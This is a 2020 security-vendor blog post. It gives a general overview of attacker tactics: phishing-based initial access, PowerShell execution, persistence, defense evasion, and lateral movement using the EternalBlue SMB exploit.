September 03, 2020 | By Ohn Klingher, Cyber Security Division
Hunting for Tactics
Gaining and Elevating Access has always been an interesting topic of dialogue across cyber defenders and adversaries. In this writeup, we discuss comprehensively – techniques, tactics, and maneuvers to aid adversaries to get access to the enterprise network and we will also examine multiple stages of an attack.
Tactics 1 – Initial access: It consists of techniques that use numerous attack vectors to gain an initial foothold within an enterprise network.
The following examples have been illustrated to demonstrate the capabilities which aid the adversaries to have early access to an environment.
- Phishing Valid Accounts – It is one of the most common forms of social engineering attack, which is primarily used to target legitimate users to extract user data.
It occurs when an adversary who masquerades as a trusted entity, sends the targeted user a text message and/or email which entices the legitimate user to open it. Once a user falls in the trap, the adversary can carry out the phishing campaign, which can potentially impact the organization in some of the following ways:
- An adversary can install malware and set it to advance within the organization as a part of the ransomware attack
- Expand the campaign – to steal sensitive information, identity theft or extortion
- Leverage it to log into external remote service
Identity theft potentially commences when the legitimate user enters his personal information replying to the malicious email, enabling the adversary to advance to the organization services such as VPNs, Outlook Web Access (OWA), remote desktops, etc.
Such information could also possibly help the adversary to gain increased privileges to the specific systems or access to restricted areas of the network.
- Execution malicious attachment-based on phishing – Adversaries could also target to send malicious links to the legitimate user with the intent to execute the malicious code snippet.
For instance, macro files can execute a specific command to load a specially crafted DLL or any other custom commands. This usually results in the adversary gaining access as per their interests. With the file once executed, a Microsoft Office or application process could:
- establish a connection with an address, which is tagged as malware as per the Threat Intelligence sources
- interact with external addresses which can impact the organization more treacherously
- create a file with an executable extension and launches it to create more damage
- load a LOLBIN (living of the land) binary and execute commands in memory while evading traditional security controls
Tactics 2 – Execution: Once an adversary gets access to the network, as we illustrated above, malicious code can be executed and privileges could be elevated.
Execution primarily consists of techniques that result in adversary controlled code to be executed either on the local or remote systems. It could be used to execute a PowerShell script in case of windows that may do Remote System Discovery, dump credentials, etc.
PowerShell – A tale of command and scripting interpreter
As we mentioned above, adversaries if uses PowerShell, can perform several actions including the extensive discovery of information and execution of code. One of the most common instances is, PowerShell being used on targeted systems of legitimate users to download files post initial exploitation to execute file-less code, interact with winAPI, and to stay “under the radar”.
Tactics 3 – Persistence: Once the adversary executes the relevant code as per their interests, they look forward to maintaining their foothold in the environment. This also signifies, they would try their best to survive device reboots, etc.
Persistence consists of techniques that help the adversaries to keep their access to systems – across restarts, any changes to the systems, or disruption to the network connectivity, which can disconnect their access from the compromised network. In this phase, an adversary can also manipulate the system configuration, create accounts to maintain access, replace legitimate code, or any files so to protect themselves from being discovered.
Tactics 4 – Defense Evasion: This phase consists of the schemes which adversaries use to avoid detection.
This primary includes – disabling or uninstalling the existing security controls, abusing common system processes that don’t appear to be suspicious, for instance, explorer.exe, svchost.exe, etc. Adversaries generally attempt to escalate the privileges by attempting to bypass User Access Control to take elevated privileges before executing the malicious payload.
Tactics 5 – Lateral Movements: Advancing through the environment is one of the crucial aspects wherein, adversaries have an objective to explore the network to find potential targets and subsequently gain access across the environment. To achieve the same, they try to operate and install remote access tools to footprint the environment, be persistent, and move latterly within the network.
Once, adversaries on the network, manage to exploit a particular service or software or operating system, for instance – the remote services, substantial damages are caused to the internal systems. Windows SMB remote code execution allows conducting lateral movements. One such model which cannot be forgotten is exploiting SMB via EternalBlue – which had a massive impact across organizations (remember WannaCry?).
Many exploitation tools like EternalBlue are primarily based on multiple vulnerabilities in the Windows implementation of the SMB protocol. Even though Microsoft has released patches for the vulnerabilities in the leak – under the MS17-010 Microsoft SMBv1 server used in Windows 7, Windows Server 2008, Windows XP, and even Windows 10 running on port 445. These vulnerabilities generally work by exploiting the Microsoft Server Message Block.
Stay Safe with TrustNet!